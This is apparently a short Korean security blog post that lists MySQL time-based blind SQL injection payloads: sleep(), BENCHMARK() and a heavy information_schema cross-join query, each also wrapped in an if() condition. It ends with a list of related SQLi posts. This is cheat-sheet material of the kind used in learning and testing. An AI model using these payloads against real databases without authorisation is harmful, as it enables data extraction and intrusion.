Self-Improvement
MySQL Time SQLi(sleep, BENCHMARK, heavy query) 본문
Sleep
| select sleep(3) |
| select if(1=1,sleep(3),2) |
Benchmark
benchmark(돌릴 횟수, 돌릴함수) 함수는 돌릴 함수에 대하여 몇번의 횟수를 반복하는지를 나타냄 이 방식을 통해 Time SQLi가 가능함
| select benchmark(1000000,md5(1)) |
| select if(1=1,benchmark(1000000,md5(1)),2) |
Heavy Query
| select count(*) from information_schema.tables tab1, information_schema.tables tab2, information_schema.tables tab3 |
| select if(1=1, (select count(*) from information_schema.tables tab1, information_schema.tables tab2, information_schema.tables tab3), 2) |
'SQLi' 카테고리의 다른 글
| 활용된 MSSQL SQLi Time base IF Statement Payload (0) | 2020.08.14 |
|---|---|
| DB별로 LEFT(), RIGHT(), LENGTH(), LEN() (0) | 2020.04.27 |
| 쿼터없이 스트링 표현하기 비교 (MySQL, MSSQL, Oracle) (0) | 2020.04.27 |
| Blind SQLi IF문 (Mysql, MSSQL(제약이 존재), Oracle(제약이 존재)) (0) | 2020.04.27 |
| Time 기반 SQLi (Heavy Query, Python 자동화 코드) (0) | 2020.04.23 |
'SQLi' Related Articles
more
